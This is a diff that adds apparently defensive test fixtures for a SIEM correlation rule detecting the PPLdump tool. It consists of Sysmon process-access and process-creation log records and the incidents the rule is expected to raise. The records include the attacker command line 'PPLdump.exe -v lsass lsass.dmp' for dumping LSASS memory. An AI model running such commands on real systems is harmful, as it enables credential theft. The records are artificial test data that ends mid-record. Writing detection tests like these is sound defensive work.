"C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\System32\\KERNELBASE.dll+2126e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+211e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+12c7|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+35c6|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+45f8|C:\\Windows\\System32\\KERNEL32.DLL+17974|C:\\Windows\\SYSTEM32\\ntdll.dll+6a271", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "747f3d96-6e19-6082-0000-001070650000", "object.process.id": "652", "object.process.name": "lsass.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1000", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T18:58:15.650Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "subject.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "subject.process.id": "6316", "subject.process.name": "ppldump.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:25.417Z", "type": "raw", "uuid": "e484f128-19a2-44f8-955e-336a4ec0c447"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:25.4180671Z\"},\"EventRecordID\":\"564591\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:25.417\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-f415-6081-0000-001040fe4900}\"},{\"Name\":\"SourceProcessId\",\"text\":\"6316\"},{\"Name\":\"SourceThreadId\",\"text\":\"2544\"},{\"Name\":\"SourceImage\",\"text\":\"c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-6e19-6082-0000-001070650000}\"},{\"Name\":\"TargetProcessId\",\"text\":\"652\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1000\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+9fc24|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+2126e|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+21a9|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+12c7|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+35c6|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+45f8|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+17974|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+6a271\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "2544", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\System32\\KERNELBASE.dll+2126e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+21a9|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+12c7|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+35c6|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+45f8|C:\\Windows\\System32\\KERNEL32.DLL+17974|C:\\Windows\\SYSTEM32\\ntdll.dll+6a271", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "747f3d96-6e19-6082-0000-001070650000", "object.process.id": "652", "object.process.name": "lsass.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1000", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T18:58:15.650Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "subject.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "subject.process.id": "6316", "subject.process.name": "ppldump.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:25.417Z", "type": "raw", "uuid": "5299519a-d1bc-4a02-9757-bb9a63dfcdf3"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "PPL_Bypass_via_PPLDump_Tool", "correlation_type": "incident", "datafield5": "2544", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\System32\\KERNELBASE.dll+2126e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+211e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+12c7|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+35c6|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+45f8|C:\\Windows\\System32\\KERNEL32.DLL+17974|C:\\Windows\\SYSTEM32\\ntdll.dll+6a271", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "PPL_Bypass_via_PPLDump_Tool|msedgewin10|PPLdump.exe -v lsass lsass.dmp", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.session_id": "773690", "object.process.cmdline": "PPLdump.exe -v lsass lsass.dmp", "object.process.cwd": "c:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "747f3d96-6e19-6082-0000-001070650000", "object.process.hash.md5": "DBCA6A3860A106333FF6BE6306B2B186", "object.process.hash.sha1": "F1C0C54AA13037F46F55B721F7E2A2349A30DBCF", "object.process.hash.sha256": "68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41", "object.process.id": "652", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "lsass.exe", "object.process.original_name": "?", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "747f3d96-f040-6081-0000-001046ac1b00", "object.process.parent.id": "4864", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "?", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "773690", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "subject.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "subject.process.id": "6316", "subject.process.name": "ppldump.exe"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_3.sc new file mode 100644 index 00000000..a5fc3309 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_3.sc @@ -0,0 +1,6 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:26.0813373Z\"},\"EventRecordID\":\"564593\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:26.016\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-f416-6081-0000-001033034a00}\"},{\"Name\":\"ProcessId\",\"text\":\"7188\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1075 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Services and Controller app\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"services.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe 652 \\\"lsass.dmp\\\" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v\"},{\"Name\":\"CurrentDirectory\",\"text\":\"c:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-6e19-6082-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=617A0A0BAAB180541DB739C4A6851D784943C317,MD5=DB896369FB58241ADF28515E3765C514,SHA256=A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC,IMPHASH=7D2820FC8CAF521DC2058168B480D204\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-f415-6081-0000-001040fe4900}\"},{\"Name\":\"ParentProcessId\",\"text\":\"6316\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"PPLdump.exe -v lsass lsass.dmp\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-6e19-6082-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\services.exe 652 \"lsass.dmp\" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v", "object.process.cwd": "c:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\services.exe", "object.process.guid": "747f3d96-f416-6081-0000-001033034a00", "object.process.hash.imphash": "7D2820FC8CAF521DC2058168B480D204", "object.process.hash.md5": "DB896369FB58241ADF28515E3765C514", "object.process.hash.sha1": "617A0A0BAAB180541DB739C4A6851D784943C317", "object.process.hash.sha256": "A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC", "object.process.id": "7188", "object.process.meta": "Description:Services and Controller app | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "services.exe", "object.process.original_name": "services.exe", "object.process.parent.cmdline": "PPLdump.exe -v lsass lsass.dmp", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "object.process.parent.guid": "747f3d96-f415-6081-0000-001040fe4900", "object.process.parent.id": "6316", "object.process.parent.name": "ppldump.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1075 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T19:00:22.549Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:26.016Z", "type": "raw", "uuid": "8aa256e5-1783-4d78-bb1e-b60d5d861d68"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:26.0831522Z\"},\"EventRecordID\":\"564594\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:26.066\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-f415-6081-0000-001040fe4900}\"},{\"Name\":\"SourceProcessId\",\"text\":\"6316\"},{\"Name\":\"SourceThreadId\",\"text\":\"2544\"},{\"Name\":\"SourceImage\",\"text\":\"c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-f416-6081-0000-001033034a00}\"},{\"Name\":\"TargetProcessId\",\"text\":\"7188\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x103801\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+a0fb4|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+485d2|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+45163|C:\\\\Windows\\\\System32\\\\ADVAPI32.dll+1c20f|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+1c47|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+35c6|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+45f8|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+17974|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+6a271\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "2544", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+485d2|C:\\Windows\\System32\\KERNELBASE.dll+45163|C:\\Windows\\System32\\ADVAPI32.dll+1c20f|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+1c47|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+35c6|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+45f8|C:\\Windows\\System32\\KERNEL32.DLL+17974|C:\\Windows\\SYSTEM32\\ntdll.dll+6a271", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\services.exe", "object.process.guid": "747f3d96-f416-6081-0000-001033034a00", "object.process.id": "7188", "object.process.name": "services.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x103801", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T19:00:22.549Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "subject.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "subject.process.id": "6316", "subject.process.name": "ppldump.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:26.066Z", "type": "raw", "uuid": "3182b375-c9ee-4c6e-844b-010b44ca4ce1"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:26.0847648Z\"},\"EventRecordID\":\"564595\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:26.066\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-6e19-6082-0000-0010e5580000}\"},{\"Name\":\"SourceProcessId\",\"text\":\"504\"},{\"Name\":\"SourceThreadId\",\"text\":\"264\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\csrss.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-f416-6081-0000-001033034a00}\"},{\"Name\":\"TargetProcessId\",\"text\":\"7188\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+9fc24|C:\\\\Windows\\\\system32\\\\basesrv.DLL+2fda|C:\\\\Windows\\\\SYSTEM32\\\\CSRSRV.dll+5e2a|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+6a27f\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "264", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\system32\\basesrv.DLL+2fda|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5e2a|C:\\Windows\\SYSTEM32\\ntdll.dll+6a27f", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\services.exe", "object.process.guid": "747f3d96-f416-6081-0000-001033034a00", "object.process.id": "7188", "object.process.name": "services.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T19:00:22.549Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\csrss.exe", "subject.process.guid": "747f3d96-6e19-6082-0000-0010e5580000", "subject.process.id": "504", "subject.process.name": "csrss.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:26.066Z", "type": "raw", "uuid": "4451a9cd-e6a6-481d-9934-ab8ebe2ca2e2"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "PPL_Bypass_via_PPLDump_Tool", "correlation_type": "incident", "datafield5": "264", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\system32\\basesrv.DLL+2fda|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5e2a|C:\\Windows\\SYSTEM32\\ntdll.dll+6a27f", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "PPL_Bypass_via_PPLDump_Tool|msedgewin10|C:\\Windows\\system32\\services.exe 652 \"lsass.dmp\" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\services.exe 652 \"lsass.dmp\" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v", "object.process.cwd": "c:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\services.exe", "object.process.guid": "747f3d96-f416-6081-0000-001033034a00", "object.process.hash.md5": "DB896369FB58241ADF28515E3765C514", "object.process.hash.sha1": "617A0A0BAAB180541DB739C4A6851D784943C317", "object.process.hash.sha256": "A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC", "object.process.id": "7188", "object.process.meta": "Description:Services and Controller app | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "services.exe", "object.process.original_name": "services.exe", "object.process.parent.cmdline": "PPLdump.exe -v lsass lsass.dmp", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "object.process.parent.guid": "747f3d96-f415-6081-0000-001040fe4900", "object.process.parent.id": "6316", "object.process.parent.name": "ppldump.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1075 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "subject.process.fullpath": "c:\\windows\\system32\\csrss.exe", "subject.process.guid": "747f3d96-6e19-6082-0000-0010e5580000", "subject.process.id": "504", "subject.process.name": "csrss.exe"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_4.sc new file mode 100644 index 00000000..4df6035e --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_4.sc @@ -0,0 +1,5 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:35.2842251Z\"},\"EventRecordID\":\"564605\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:35.263\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-f41f-6081-0000-001078834a00}\"},{\"Name\":\"ProcessId\",\"text\":\"6644\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p -s fdPHost\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-6e1a-6082-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"624\"},{\"Name\":\"ParentImage\",\"text\":\"?\"},{\"Name\":\"ParentCommandLine\",\"text\":\"?\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-6e1a-6082-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-f41f-6081-0000-001078834a00", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": 